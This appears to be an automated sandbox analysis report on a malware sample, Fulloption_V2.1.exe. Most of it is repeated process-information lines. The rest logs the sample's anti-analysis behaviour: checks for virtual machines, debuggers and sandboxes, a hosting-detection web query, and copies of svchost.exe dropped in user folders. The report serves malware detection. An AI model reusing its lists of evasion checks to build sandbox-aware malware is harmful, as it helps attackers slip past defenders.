                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: FullOption_2.1Xenos.exe.0.drBinary or memory string: BET\SBAGGY2\SBAGGY\EXAMPLES\BACKENDS\IMGUI_IMPL_WIN32.CPPIO.BACKENDPLATFORMUSERDATA == NULLPTR && "ALREADY INITIALIZED A PLATFORM BACKEND!"IMGUI_IMPL_WIN32XINPUT1_4.DLLXINPUT1_3.DLLXINPUT9_1_0.DLLXINPUT1_2.DLLXINPUT1_1.DLLXINPUTGETCAPABILITIESXINPUTGETSTATEBD != NULLPTR && "NO PLATFORM BACKEND TO SHUTDOWN, OR ALREADY SHUTDOWN?"BD->HWND != 0BD != NULLPTR && "DID YOU CALL IMGUI_IMPLWIN32_INIT()?" NTSETINFORMATIONTHREADNTDLL.DLL*VMWARE**VBOX**VIRTUAL*SYSTEM\CONTROLSET001\SERVICES\DISK\ENUMSBIEDLL.DLLVBOXHOOK.DLL\\.\VBOXMINIRDRDNOLLYDBG - [CPU]OLLYDBGIMMUNITY DEBUGGER - [CPU]X64DBGHTTP DEBUGGERCHEAT user 7.4THE WIRESHARK NETWORK ANALYZERPROGRESS TELERIK FIDDLER CLASSICCHARLES 4.6.2 - SESSION 1 *CHARLES 4.6.2 - SESSION 2 *CHARLES 4.6.2 - SESSION 3 *SCYLLA X64 V0.9.8SCYLLA X86 V0.9.8X64DBG[ELEVATED]CHEATuser-X86_64.EXEOLLYDBG.EXEIDA.EXEIDA64.EXERADARE2.EXEX64DBG.EXECHEATuser-X86_64-SSE4-AVX2OLLYDBG.EXECHARLES.EXEWIRESHARK.EXEHTTPDEBUGGERUI.EXEKSDUMPERCLIENT.EXEPROCESSHACKER.EXESCYLLA_X86SCYLLA_X64IT IS IMPOSSIBLE TO CHECK PROCESS LIST.OLLYDBGIDXTPMAINFRAMESUNAWTFRAMEWINLISTERMAINPROCESSHACKERNTQUERYINFORMATIONPROCESS%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S: GENERICSYSTEMBAD CASTINVALID STOF ARGUMENTSTOF ARGUMENT OUT OF RANGELOADED!
                        Source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 00000003.00000002.3395976559.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, FullOption_2.1Xenos.exe.0.drBinary or memory string: SBIEDLL.DLL
                        Source: Fulloption_V2.1.exe, 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmp, svchost.exe, 00000003.00000002.3395976559.000000000336E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe.3.dr, svchost.exe.0.drBinary or memory string: SBIEDLL.DLL?1BACBVD8VOSDNODQXYKYKOXGCYB3L4H?XCITP4RXVNDTI8LNZ5A14XDDTULYW2Q?QDU75J9E9ZOPQDKVOU2JYVBLVNBFALY?OOXPU559F4RWTSRV9EANW2ZO42GGH6W?DE1LG4YYVDX7NM9MHXPCIRR0LERTDOU?OTLGKTGYHLIUQO0VTPBJ9O2BJMSFQVS?MLQ8RHEN8WZC8Y9O8CUQEPKAJPFIR1M?GHQBU1PKCTUDZX8N6DUED1SCBUXPWCE?CBIQBXJ8NGHLEGU7NZU2CWP5KVXJ3LO
                        Source: FullOption_2.1Xenos.exe.0.drBinary or memory string: .: "", "*EXISTSCREATE_DIRECTORYREMOVE_ALLDNSPY.EXEPROCEXP.EXEX96DBG.EXEX32DBG.EXEILSPY.EXEJETBRAINS.EXEWINDBG.EXEGDB.EXESCYLLA_X64.EXESCYLLA_X86.EXESHARPDEVELOP.EXEMONODEVELOP.EXEOLLYDBG.EXEMEMORYPROFILER.EXEANTS PERFORMANCE PROFILER.EXEJUSTTRACE.EXEBUGAID.EXEREFLECTOR.EXEDOTMEMORY.EXEEVERYTHING.EXECHEATuser-I386.EXEHTTPDEBUGGERSVC.EXEMEGADUMPER.EXEEXTREMEDUMPER.EXEDE4DOT.EXEDE4DOT64.EXEDE4DOT-CEX.EXEDNSPY-X64.EXEDNSPY-X86.EXEDNSPY.EXEINJECTIONDEBUGGER.EXEDUMPER.EXEDEBUGTOOL.EXEREVERSEuser.EXECODEINSPECTOR.EXEMEMORYDUMP.EXEBINARYANALYZER.EXEREVERSEDEBUGGER.EXECRASHDUMPANALYZER.EXECODEEXTRACTOR.EXEBYTESCANNER.EXEDEBUGMONITOR.EXEDECOMPILERTOOL.EXEAPIHOOKDETECTOR.EXEPATCHANALYZER.EXEMEMORYSPY.EXECODETRACER.EXEBINARYINSPECTOR.EXEDEBUGASSISTANT.EXEREVERSEANALYZER.EXEPATCHEXTRACTOR.EXECRASHDUMPREADER.EXECODERECONSTRUCTOR.EXEBYTEINSPECTOR.EXEMALWAREDEBUGGER.EXEHOOKMONITOR.EXEDECOMPILERTOOLSET.EXEBINARYRECONSTRUCTOR.EXEDEBUGGINGWIZARD.EXEBINARYINSPECTORPRO.EXEDEBUGASSISTANTPRO.EXEPATCHCRAFT.EXECONTROLFLOWEXPLORER.EXESIGNATURESCANNER.EXEASSEMBLYINSPECTOR.EXEDECOMPILERX.EXECODEREVEAL.EXEREVERSOMASTER.EXEINSTRUCTIONTRACER.EXEDEBUGASSIST.EXEFLOWANALYZER.EXEMEMORYWATCHER.EXEBREAKPOINTDEBUGGER.EXEVARIABLEINSPECTOR.EXEEXECUTIONTRACKER.EXERUNTIMEDEBUGGER.EXEBYTESCANPRO.EXEMEMORYSNAPSHOTTER.EXEDUMPEXPLORER.EXEDATAHARVEST.EXEBINARYDUMPTOOL.EXEBYTEEXTRACTOR.EXECODESNAPSHOT.EXEMEMORYDUMPPRO.EXEDATAEXTRACT.EXEDUMPMASTER.EXECONTROLFLOWINSPECTOR.EXEFUNCTIONEXTRACTORX.EXESIGNATURESEARCHER.EXEREVERSECODEEXPLORER.EXEASSEMBLYANALYZER.EXEDECOMPILERPRO.EXEBYTEPATCHMASTER.EXECODEREVEALX.EXEDEBUGFLOWMASTER.EXEBREAKPOINTASSISTANT.EXEVARIABLEDEBUGGER.EXEEXECUTIONTRACKERPRO.EXERUNTIMEINSPECTOR.EXEGORGONIDA.EXEHADESDEBUGGER.EXEPHOENIXDISASSEMBLER.EXEELYSIUMANALYZER.EXECERBERUSCRACKER.EXEHYDRARECONSTRUCTOR.EXECHIMERAPATCHKIT.EXEMEDUSAPROFILER.EXENEMEANDECRYPTOR.EXESPHINXCODEEXPLORER.EXEBASILISKRECONSTRUCTOR.EXEMANTICOREANALYZER.EXELEVIATHANDEBUGGER.EXEGRIFFINDECRYPTOR.EXEHYDRAPATCHuser.EXEPHOENIXINJECTOR.EXESPHINXREVERSER.EXECHIMERATRACER.EXECERBERUSDISASSEMBLER.EXEGORGONCODEANALYZER.EXELEVIATHANTRACER.EXEGRIFFINDISASSEMBLER.EXECHIMERARECONSTRUCTOR.EXEBASILISKDECRYPTOR.EXESPHINXCODEINJECTOR.EXECERBERUSANALYZER.EXEGORGONREVERSER.EXEHYDRADEBUGGER.EXEDE4DOTUNPACKER.EXEKRAKENDEBUGGER.EXEOUROBOROSDECRYPTOR.EXESERPENTDISASSEMBLER.EXEWYVERNCODEANALYZER.EXEFUNCTIONEXTRACTOR.EXEDE4DOTPRO.EXEDEOBFUSCATOR.EXENET-DEOBFUSCATOR.EXESYSTEM INFORMER.EXEPROCESS HACKER.EXEPROCEXP64.EXEPROCEXP64A.EXEDE4DOT64.EXEPROCESS HACKER.EXECHEAT userCHEATuser-X86_64-SSE4-AVX2.EXEX64DBG-UNSIGNED.EXESAVE DATA/ FOR WRITING.UNABLE TO OPEN FILE DATA FILES (*.DAT)*.DATSAVE DATA\@
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeMemory allocated: 1B250000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1B2A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\ProgramData\svchost.exeMemory allocated: 1590000 memory reserve | memory write watch
                        Source: C:\ProgramData\svchost.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                        Source: C:\ProgramData\svchost.exeMemory allocated: 13D0000 memory reserve | memory write watch
                        Source: C:\ProgramData\svchost.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 5498Jump to behavior
